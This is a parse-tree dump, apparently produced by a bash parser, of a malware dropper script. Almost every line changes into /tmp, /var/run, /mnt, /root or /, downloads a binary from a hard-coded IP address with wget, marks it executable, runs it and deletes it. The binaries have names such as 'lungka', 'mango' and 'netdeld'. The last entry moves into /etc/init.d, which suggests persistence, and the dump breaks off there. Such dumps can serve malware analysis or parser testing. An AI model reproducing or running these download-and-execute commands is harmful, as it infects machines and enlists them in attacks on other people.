ListNode(lineno=2, pos=(12, 142), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://194.67.209.171/lungka'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 117), parts=[
    WordNode(lineno=2, pos=(102, 107), word='chmod'),
    WordNode(lineno=2, pos=(108, 110), word='+x'),
    WordNode(lineno=2, pos=(111, 117), word='lungka'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(117, 118)),
  CommandNode(lineno=2, pos=(119, 127), parts=[
    WordNode(lineno=2, pos=(119, 127), word='./lungka'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(127, 128)),
  CommandNode(lineno=2, pos=(129, 142), parts=[
    WordNode(lineno=2, pos=(129, 131), word='rm'),
    WordNode(lineno=2, pos=(132, 135), word='-rf'),
    WordNode(lineno=2, pos=(136, 142), word='lungka'),
  ]),
])
ListNode(lineno=3, pos=(143, 269), parts=[
  CommandNode(lineno=3, pos=(143, 150), parts=[
    WordNode(lineno=3, pos=(143, 145), word='cd'),
    WordNode(lineno=3, pos=(146, 150), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(151, 153)),
  CommandNode(lineno=3, pos=(154, 165), parts=[
    WordNode(lineno=3, pos=(154, 156), word='cd'),
    WordNode(lineno=3, pos=(157, 165), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(166, 168)),
  CommandNode(lineno=3, pos=(169, 176), parts=[
    WordNode(lineno=3, pos=(169, 171), word='cd'),
    WordNode(lineno=3, pos=(172, 176), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 188), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 188), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(189, 191)),
  CommandNode(lineno=3, pos=(192, 196), parts=[
    WordNode(lineno=3, pos=(192, 194), word='cd'),
    WordNode(lineno=3, pos=(195, 196), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(196, 197)),
  CommandNode(lineno=3, pos=(198, 230), parts=[
    WordNode(lineno=3, pos=(198, 202), word='wget'),
    WordNode(lineno=3, pos=(203, 230), word='http://194.67.209.171/mango'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(230, 231)),
  CommandNode(lineno=3, pos=(232, 246), parts=[
    WordNode(lineno=3, pos=(232, 237), word='chmod'),
    WordNode(lineno=3, pos=(238, 240), word='+x'),
    WordNode(lineno=3, pos=(241, 246), word='mango'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(246, 247)),
  CommandNode(lineno=3, pos=(248, 255), parts=[
    WordNode(lineno=3, pos=(248, 255), word='./mango'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(255, 256)),
  CommandNode(lineno=3, pos=(257, 269), parts=[
    WordNode(lineno=3, pos=(257, 259), word='rm'),
    WordNode(lineno=3, pos=(260, 263), word='-rf'),
    WordNode(lineno=3, pos=(264, 269), word='mango'),
  ]),
])
ListNode(lineno=4, pos=(270, 404), parts=[
  CommandNode(lineno=4, pos=(270, 277), parts=[
    WordNode(lineno=4, pos=(270, 272), word='cd'),
    WordNode(lineno=4, pos=(273, 277), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(278, 280)),
  CommandNode(lineno=4, pos=(281, 292), parts=[
    WordNode(lineno=4, pos=(281, 283), word='cd'),
    WordNode(lineno=4, pos=(284, 292), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(293, 295)),
  CommandNode(lineno=4, pos=(296, 303), parts=[
    WordNode(lineno=4, pos=(296, 298), word='cd'),
    WordNode(lineno=4, pos=(299, 303), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(304, 306)),
  CommandNode(lineno=4, pos=(307, 315), parts=[
    WordNode(lineno=4, pos=(307, 309), word='cd'),
    WordNode(lineno=4, pos=(310, 315), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(316, 318)),
  CommandNode(lineno=4, pos=(319, 323), parts=[
    WordNode(lineno=4, pos=(319, 321), word='cd'),
    WordNode(lineno=4, pos=(322, 323), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(323, 324)),
  CommandNode(lineno=4, pos=(325, 359), parts=[
    WordNode(lineno=4, pos=(325, 329), word='wget'),
    WordNode(lineno=4, pos=(330, 359), word='http://194.67.209.171/openggl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(359, 360)),
  CommandNode(lineno=4, pos=(361, 377), parts=[
    WordNode(lineno=4, pos=(361, 366), word='chmod'),
    WordNode(lineno=4, pos=(367, 369), word='+x'),
    WordNode(lineno=4, pos=(370, 377), word='openggl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(377, 378)),
  CommandNode(lineno=4, pos=(379, 388), parts=[
    WordNode(lineno=4, pos=(379, 388), word='./openggl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(388, 389)),
  CommandNode(lineno=4, pos=(390, 404), parts=[
    WordNode(lineno=4, pos=(390, 392), word='rm'),
    WordNode(lineno=4, pos=(393, 396), word='-rf'),
    WordNode(lineno=4, pos=(397, 404), word='openggl'),
  ]),
])
ListNode(lineno=5, pos=(405, 527), parts=[
  CommandNode(lineno=5, pos=(405, 412), parts=[
    WordNode(lineno=5, pos=(405, 407), word='cd'),
    WordNode(lineno=5, pos=(408, 412), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(413, 415)),
  CommandNode(lineno=5, pos=(416, 427), parts=[
    WordNode(lineno=5, pos=(416, 418), word='cd'),
    WordNode(lineno=5, pos=(419, 427), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(428, 430)),
  CommandNode(lineno=5, pos=(431, 438), parts=[
    WordNode(lineno=5, pos=(431, 433), word='cd'),
    WordNode(lineno=5, pos=(434, 438), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(439, 441)),
  CommandNode(lineno=5, pos=(442, 450), parts=[
    WordNode(lineno=5, pos=(442, 444), word='cd'),
    WordNode(lineno=5, pos=(445, 450), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(451, 453)),
  CommandNode(lineno=5, pos=(454, 458), parts=[
    WordNode(lineno=5, pos=(454, 456), word='cd'),
    WordNode(lineno=5, pos=(457, 458), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(458, 459)),
  CommandNode(lineno=5, pos=(460, 491), parts=[
    WordNode(lineno=5, pos=(460, 464), word='wget'),
    WordNode(lineno=5, pos=(465, 491), word='http://194.67.209.171/vast'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(491, 492)),
  CommandNode(lineno=5, pos=(493, 506), parts=[
    WordNode(lineno=5, pos=(493, 498), word='chmod'),
    WordNode(lineno=5, pos=(499, 501), word='+x'),
    WordNode(lineno=5, pos=(502, 506), word='vast'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(506, 507)),
  CommandNode(lineno=5, pos=(508, 514), parts=[
    WordNode(lineno=5, pos=(508, 514), word='./vast'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(514, 515)),
  CommandNode(lineno=5, pos=(516, 527), parts=[
    WordNode(lineno=5, pos=(516, 518), word='rm'),
    WordNode(lineno=5, pos=(519, 522), word='-rf'),
    WordNode(lineno=5, pos=(523, 527), word='vast'),
  ]),
])
ListNode(lineno=6, pos=(528, 658), parts=[
  CommandNode(lineno=6, pos=(528, 535), parts=[
    WordNode(lineno=6, pos=(528, 530), word='cd'),
    WordNode(lineno=6, pos=(531, 535), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(536, 538)),
  CommandNode(lineno=6, pos=(539, 550), parts=[
    WordNode(lineno=6, pos=(539, 541), word='cd'),
    WordNode(lineno=6, pos=(542, 550), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(551, 553)),
  CommandNode(lineno=6, pos=(554, 561), parts=[
    WordNode(lineno=6, pos=(554, 556), word='cd'),
    WordNode(lineno=6, pos=(557, 561), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(562, 564)),
  CommandNode(lineno=6, pos=(565, 573), parts=[
    WordNode(lineno=6, pos=(565, 567), word='cd'),
    WordNode(lineno=6, pos=(568, 573), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(574, 576)),
  CommandNode(lineno=6, pos=(577, 581), parts=[
    WordNode(lineno=6, pos=(577, 579), word='cd'),
    WordNode(lineno=6, pos=(580, 581), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(581, 582)),
  CommandNode(lineno=6, pos=(583, 616), parts=[
    WordNode(lineno=6, pos=(583, 587), word='wget'),
    WordNode(lineno=6, pos=(588, 616), word='http://194.67.209.171/greyps'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(616, 617)),
  CommandNode(lineno=6, pos=(618, 633), parts=[
    WordNode(lineno=6, pos=(618, 623), word='chmod'),
    WordNode(lineno=6, pos=(624, 626), word='+x'),
    WordNode(lineno=6, pos=(627, 633), word='greyps'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(633, 634)),
  CommandNode(lineno=6, pos=(635, 643), parts=[
    WordNode(lineno=6, pos=(635, 643), word='./greyps'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(643, 644)),
  CommandNode(lineno=6, pos=(645, 658), parts=[
    WordNode(lineno=6, pos=(645, 647), word='rm'),
    WordNode(lineno=6, pos=(648, 651), word='-rf'),
    WordNode(lineno=6, pos=(652, 658), word='greyps'),
  ]),
])
ListNode(lineno=7, pos=(659, 789), parts=[
  CommandNode(lineno=7, pos=(659, 666), parts=[
    WordNode(lineno=7, pos=(659, 661), word='cd'),
    WordNode(lineno=7, pos=(662, 666), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(667, 669)),
  CommandNode(lineno=7, pos=(670, 681), parts=[
    WordNode(lineno=7, pos=(670, 672), word='cd'),
    WordNode(lineno=7, pos=(673, 681), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(682, 684)),
  CommandNode(lineno=7, pos=(685, 692), parts=[
    WordNode(lineno=7, pos=(685, 687), word='cd'),
    WordNode(lineno=7, pos=(688, 692), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(693, 695)),
  CommandNode(lineno=7, pos=(696, 704), parts=[
    WordNode(lineno=7, pos=(696, 698), word='cd'),
    WordNode(lineno=7, pos=(699, 704), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(705, 707)),
  CommandNode(lineno=7, pos=(708, 712), parts=[
    WordNode(lineno=7, pos=(708, 710), word='cd'),
    WordNode(lineno=7, pos=(711, 712), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(712, 713)),
  CommandNode(lineno=7, pos=(714, 747), parts=[
    WordNode(lineno=7, pos=(714, 718), word='wget'),
    WordNode(lineno=7, pos=(719, 747), word='http://194.67.209.171/kuhamo'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(747, 748)),
  CommandNode(lineno=7, pos=(749, 764), parts=[
    WordNode(lineno=7, pos=(749, 754), word='chmod'),
    WordNode(lineno=7, pos=(755, 757), word='+x'),
    WordNode(lineno=7, pos=(758, 764), word='kuhamo'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(764, 765)),
  CommandNode(lineno=7, pos=(766, 774), parts=[
    WordNode(lineno=7, pos=(766, 774), word='./kuhamo'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(774, 775)),
  CommandNode(lineno=7, pos=(776, 789), parts=[
    WordNode(lineno=7, pos=(776, 778), word='rm'),
    WordNode(lineno=7, pos=(779, 782), word='-rf'),
    WordNode(lineno=7, pos=(783, 789), word='kuhamo'),
  ]),
])
ListNode(lineno=8, pos=(790, 920), parts=[
  CommandNode(lineno=8, pos=(790, 797), parts=[
    WordNode(lineno=8, pos=(790, 792), word='cd'),
    WordNode(lineno=8, pos=(793, 797), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(798, 800)),
  CommandNode(lineno=8, pos=(801, 812), parts=[
    WordNode(lineno=8, pos=(801, 803), word='cd'),
    WordNode(lineno=8, pos=(804, 812), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(813, 815)),
  CommandNode(lineno=8, pos=(816, 823), parts=[
    WordNode(lineno=8, pos=(816, 818), word='cd'),
    WordNode(lineno=8, pos=(819, 823), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(824, 826)),
  CommandNode(lineno=8, pos=(827, 835), parts=[
    WordNode(lineno=8, pos=(827, 829), word='cd'),
    WordNode(lineno=8, pos=(830, 835), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(836, 838)),
  CommandNode(lineno=8, pos=(839, 843), parts=[
    WordNode(lineno=8, pos=(839, 841), word='cd'),
    WordNode(lineno=8, pos=(842, 843), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(843, 844)),
  CommandNode(lineno=8, pos=(845, 878), parts=[
    WordNode(lineno=8, pos=(845, 849), word='wget'),
    WordNode(lineno=8, pos=(850, 878), word='http://194.67.209.171/marcos'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(878, 879)),
  CommandNode(lineno=8, pos=(880, 895), parts=[
    WordNode(lineno=8, pos=(880, 885), word='chmod'),
    WordNode(lineno=8, pos=(886, 888), word='+x'),
    WordNode(lineno=8, pos=(889, 895), word='marcos'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(895, 896)),
  CommandNode(lineno=8, pos=(897, 905), parts=[
    WordNode(lineno=8, pos=(897, 905), word='./marcos'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(905, 906)),
  CommandNode(lineno=8, pos=(907, 920), parts=[
    WordNode(lineno=8, pos=(907, 909), word='rm'),
    WordNode(lineno=8, pos=(910, 913), word='-rf'),
    WordNode(lineno=8, pos=(914, 920), word='marcos'),
  ]),
])
ListNode(lineno=9, pos=(921, 1047), parts=[
  CommandNode(lineno=9, pos=(921, 928), parts=[
    WordNode(lineno=9, pos=(921, 923), word='cd'),
    WordNode(lineno=9, pos=(924, 928), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(929, 931)),
  CommandNode(lineno=9, pos=(932, 943), parts=[
    WordNode(lineno=9, pos=(932, 934), word='cd'),
    WordNode(lineno=9, pos=(935, 943), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(944, 946)),
  CommandNode(lineno=9, pos=(947, 954), parts=[
    WordNode(lineno=9, pos=(947, 949), word='cd'),
    WordNode(lineno=9, pos=(950, 954), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(955, 957)),
  CommandNode(lineno=9, pos=(958, 966), parts=[
    WordNode(lineno=9, pos=(958, 960), word='cd'),
    WordNode(lineno=9, pos=(961, 966), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(967, 969)),
  CommandNode(lineno=9, pos=(970, 974), parts=[
    WordNode(lineno=9, pos=(970, 972), word='cd'),
    WordNode(lineno=9, pos=(973, 974), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(974, 975)),
  CommandNode(lineno=9, pos=(976, 1008), parts=[
    WordNode(lineno=9, pos=(976, 980), word='wget'),
    WordNode(lineno=9, pos=(981, 1008), word='http://194.67.209.171/chiko'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1008, 1009)),
  CommandNode(lineno=9, pos=(1010, 1024), parts=[
    WordNode(lineno=9, pos=(1010, 1015), word='chmod'),
    WordNode(lineno=9, pos=(1016, 1018), word='+x'),
    WordNode(lineno=9, pos=(1019, 1024), word='chiko'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1024, 1025)),
  CommandNode(lineno=9, pos=(1026, 1033), parts=[
    WordNode(lineno=9, pos=(1026, 1033), word='./chiko'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1033, 1034)),
  CommandNode(lineno=9, pos=(1035, 1047), parts=[
    WordNode(lineno=9, pos=(1035, 1037), word='rm'),
    WordNode(lineno=9, pos=(1038, 1041), word='-rf'),
    WordNode(lineno=9, pos=(1042, 1047), word='chiko'),
  ]),
])
ListNode(lineno=10, pos=(1048, 1178), parts=[
  CommandNode(lineno=10, pos=(1048, 1055), parts=[
    WordNode(lineno=10, pos=(1048, 1050), word='cd'),
    WordNode(lineno=10, pos=(1051, 1055), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1056, 1058)),
  CommandNode(lineno=10, pos=(1059, 1070), parts=[
    WordNode(lineno=10, pos=(1059, 1061), word='cd'),
    WordNode(lineno=10, pos=(1062, 1070), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1071, 1073)),
  CommandNode(lineno=10, pos=(1074, 1081), parts=[
    WordNode(lineno=10, pos=(1074, 1076), word='cd'),
    WordNode(lineno=10, pos=(1077, 1081), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1082, 1084)),
  CommandNode(lineno=10, pos=(1085, 1093), parts=[
    WordNode(lineno=10, pos=(1085, 1087), word='cd'),
    WordNode(lineno=10, pos=(1088, 1093), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1094, 1096)),
  CommandNode(lineno=10, pos=(1097, 1101), parts=[
    WordNode(lineno=10, pos=(1097, 1099), word='cd'),
    WordNode(lineno=10, pos=(1100, 1101), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1101, 1102)),
  CommandNode(lineno=10, pos=(1103, 1136), parts=[
    WordNode(lineno=10, pos=(1103, 1107), word='wget'),
    WordNode(lineno=10, pos=(1108, 1136), word='http://194.67.209.171/pchiko'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1136, 1137)),
  CommandNode(lineno=10, pos=(1138, 1153), parts=[
    WordNode(lineno=10, pos=(1138, 1143), word='chmod'),
    WordNode(lineno=10, pos=(1144, 1146), word='+x'),
    WordNode(lineno=10, pos=(1147, 1153), word='pchiko'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1153, 1154)),
  CommandNode(lineno=10, pos=(1155, 1163), parts=[
    WordNode(lineno=10, pos=(1155, 1163), word='./pchiko'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1163, 1164)),
  CommandNode(lineno=10, pos=(1165, 1178), parts=[
    WordNode(lineno=10, pos=(1165, 1167), word='rm'),
    WordNode(lineno=10, pos=(1168, 1171), word='-rf'),
    WordNode(lineno=10, pos=(1172, 1178), word='pchiko'),
  ]),
])
ListNode(lineno=11, pos=(1179, 1293), parts=[
  CommandNode(lineno=11, pos=(1179, 1186), parts=[
    WordNode(lineno=11, pos=(1179, 1181), word='cd'),
    WordNode(lineno=11, pos=(1182, 1186), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1187, 1189)),
  CommandNode(lineno=11, pos=(1190, 1201), parts=[
    WordNode(lineno=11, pos=(1190, 1192), word='cd'),
    WordNode(lineno=11, pos=(1193, 1201), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1202, 1204)),
  CommandNode(lineno=11, pos=(1205, 1212), parts=[
    WordNode(lineno=11, pos=(1205, 1207), word='cd'),
    WordNode(lineno=11, pos=(1208, 1212), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1213, 1215)),
  CommandNode(lineno=11, pos=(1216, 1224), parts=[
    WordNode(lineno=11, pos=(1216, 1218), word='cd'),
    WordNode(lineno=11, pos=(1219, 1224), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1225, 1227)),
  CommandNode(lineno=11, pos=(1228, 1232), parts=[
    WordNode(lineno=11, pos=(1228, 1230), word='cd'),
    WordNode(lineno=11, pos=(1231, 1232), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1232, 1233)),
  CommandNode(lineno=11, pos=(1234, 1263), parts=[
    WordNode(lineno=11, pos=(1234, 1238), word='wget'),
    WordNode(lineno=11, pos=(1239, 1263), word='http://194.67.209.171/co'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1263, 1264)),
  CommandNode(lineno=11, pos=(1265, 1276), parts=[
    WordNode(lineno=11, pos=(1265, 1270), word='chmod'),
    WordNode(lineno=11, pos=(1271, 1273), word='+x'),
    WordNode(lineno=11, pos=(1274, 1276), word='co'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1276, 1277)),
  CommandNode(lineno=11, pos=(1278, 1282), parts=[
    WordNode(lineno=11, pos=(1278, 1282), word='./co'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1282, 1283)),
  CommandNode(lineno=11, pos=(1284, 1293), parts=[
    WordNode(lineno=11, pos=(1284, 1286), word='rm'),
    WordNode(lineno=11, pos=(1287, 1290), word='-rf'),
    WordNode(lineno=11, pos=(1291, 1293), word='co'),
  ]),
])
ListNode(lineno=12, pos=(1294, 1412), parts=[
  CommandNode(lineno=12, pos=(1294, 1301), parts=[
    WordNode(lineno=12, pos=(1294, 1296), word='cd'),
    WordNode(lineno=12, pos=(1297, 1301), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1302, 1304)),
  CommandNode(lineno=12, pos=(1305, 1316), parts=[
    WordNode(lineno=12, pos=(1305, 1307), word='cd'),
    WordNode(lineno=12, pos=(1308, 1316), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1317, 1319)),
  CommandNode(lineno=12, pos=(1320, 1327), parts=[
    WordNode(lineno=12, pos=(1320, 1322), word='cd'),
    WordNode(lineno=12, pos=(1323, 1327), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1328, 1330)),
  CommandNode(lineno=12, pos=(1331, 1339), parts=[
    WordNode(lineno=12, pos=(1331, 1333), word='cd'),
    WordNode(lineno=12, pos=(1334, 1339), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1340, 1342)),
  CommandNode(lineno=12, pos=(1343, 1347), parts=[
    WordNode(lineno=12, pos=(1343, 1345), word='cd'),
    WordNode(lineno=12, pos=(1346, 1347), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1347, 1348)),
  CommandNode(lineno=12, pos=(1349, 1379), parts=[
    WordNode(lineno=12, pos=(1349, 1353), word='wget'),
    WordNode(lineno=12, pos=(1354, 1379), word='http://194.67.209.171/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1379, 1380)),
  CommandNode(lineno=12, pos=(1381, 1393), parts=[
    WordNode(lineno=12, pos=(1381, 1386), word='chmod'),
    WordNode(lineno=12, pos=(1387, 1389), word='+x'),
    WordNode(lineno=12, pos=(1390, 1393), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1393, 1394)),
  CommandNode(lineno=12, pos=(1395, 1400), parts=[
    WordNode(lineno=12, pos=(1395, 1400), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1400, 1401)),
  CommandNode(lineno=12, pos=(1402, 1412), parts=[
    WordNode(lineno=12, pos=(1402, 1404), word='rm'),
    WordNode(lineno=12, pos=(1405, 1408), word='-rf'),
    WordNode(lineno=12, pos=(1409, 1412), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1413, 1555), parts=[
  CommandNode(lineno=13, pos=(1413, 1420), parts=[
    WordNode(lineno=13, pos=(1413, 1415), word='cd'),
    WordNode(lineno=13, pos=(1416, 1420), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1421, 1423)),
  CommandNode(lineno=13, pos=(1424, 1435), parts=[
    WordNode(lineno=13, pos=(1424, 1426), word='cd'),
    WordNode(lineno=13, pos=(1427, 1435), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1436, 1438)),
  CommandNode(lineno=13, pos=(1439, 1446), parts=[
    WordNode(lineno=13, pos=(1439, 1441), word='cd'),
    WordNode(lineno=13, pos=(1442, 1446), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1447, 1449)),
  CommandNode(lineno=13, pos=(1450, 1458), parts=[
    WordNode(lineno=13, pos=(1450, 1452), word='cd'),
    WordNode(lineno=13, pos=(1453, 1458), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1459, 1461)),
  CommandNode(lineno=13, pos=(1462, 1466), parts=[
    WordNode(lineno=13, pos=(1462, 1464), word='cd'),
    WordNode(lineno=13, pos=(1465, 1466), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1466, 1467)),
  CommandNode(lineno=13, pos=(1468, 1504), parts=[
    WordNode(lineno=13, pos=(1468, 1472), word='wget'),
    WordNode(lineno=13, pos=(1473, 1504), word='http://194.67.209.171/facebook2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1504, 1505)),
  CommandNode(lineno=13, pos=(1506, 1524), parts=[
    WordNode(lineno=13, pos=(1506, 1511), word='chmod'),
    WordNode(lineno=13, pos=(1512, 1514), word='+x'),
    WordNode(lineno=13, pos=(1515, 1524), word='facebook2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1524, 1525)),
  CommandNode(lineno=13, pos=(1526, 1537), parts=[
    WordNode(lineno=13, pos=(1526, 1537), word='./facebook2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1537, 1538)),
  CommandNode(lineno=13, pos=(1539, 1555), parts=[
    WordNode(lineno=13, pos=(1539, 1541), word='rm'),
    WordNode(lineno=13, pos=(1542, 1545), word='-rf'),
    WordNode(lineno=13, pos=(1546, 1555), word='facebook2'),
  ]),
])
ListNode(lineno=14, pos=(1556, 1690), parts=[
  CommandNode(lineno=14, pos=(1556, 1563), parts=[
    WordNode(lineno=14, pos=(1556, 1558), word='cd'),
    WordNode(lineno=14, pos=(1559, 1563), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1564, 1566)),
  CommandNode(lineno=14, pos=(1567, 1578), parts=[
    WordNode(lineno=14, pos=(1567, 1569), word='cd'),
    WordNode(lineno=14, pos=(1570, 1578), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1579, 1581)),
  CommandNode(lineno=14, pos=(1582, 1589), parts=[
    WordNode(lineno=14, pos=(1582, 1584), word='cd'),
    WordNode(lineno=14, pos=(1585, 1589), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1590, 1592)),
  CommandNode(lineno=14, pos=(1593, 1601), parts=[
    WordNode(lineno=14, pos=(1593, 1595), word='cd'),
    WordNode(lineno=14, pos=(1596, 1601), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1602, 1604)),
  CommandNode(lineno=14, pos=(1605, 1609), parts=[
    WordNode(lineno=14, pos=(1605, 1607), word='cd'),
    WordNode(lineno=14, pos=(1608, 1609), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1609, 1610)),
  CommandNode(lineno=14, pos=(1611, 1645), parts=[
    WordNode(lineno=14, pos=(1611, 1615), word='wget'),
    WordNode(lineno=14, pos=(1616, 1645), word='http://194.67.209.171/netdeld'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1645, 1646)),
  CommandNode(lineno=14, pos=(1647, 1663), parts=[
    WordNode(lineno=14, pos=(1647, 1652), word='chmod'),
    WordNode(lineno=14, pos=(1653, 1655), word='+x'),
    WordNode(lineno=14, pos=(1656, 1663), word='netdeld'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1663, 1664)),
  CommandNode(lineno=14, pos=(1665, 1674), parts=[
    WordNode(lineno=14, pos=(1665, 1674), word='./netdeld'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1674, 1675)),
  CommandNode(lineno=14, pos=(1676, 1690), parts=[
    WordNode(lineno=14, pos=(1676, 1678), word='rm'),
    WordNode(lineno=14, pos=(1679, 1682), word='-rf'),
    WordNode(lineno=14, pos=(1683, 1690), word='netdeld'),
  ]),
])
ListNode(lineno=15, pos=(1691, 1788), parts=[
  CommandNode(lineno=15, pos=(1691, 1705), parts=[
    WordNode(lineno=15, pos=(1691, 1693), word='cd'),
    WordNode(lineno=15, pos=(1694, 1705), word='/etc/init.d'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1705, 1706)),
  CommandNode(lineno=15, pos=(1707, 1739), parts=[
    WordNode(lineno=15, pos=(1707, 1711), word='wget'),
    WordNode(lineno=15, pos=(1712, 1739), word='http://194.67.209.171/hatak'),
  ]),
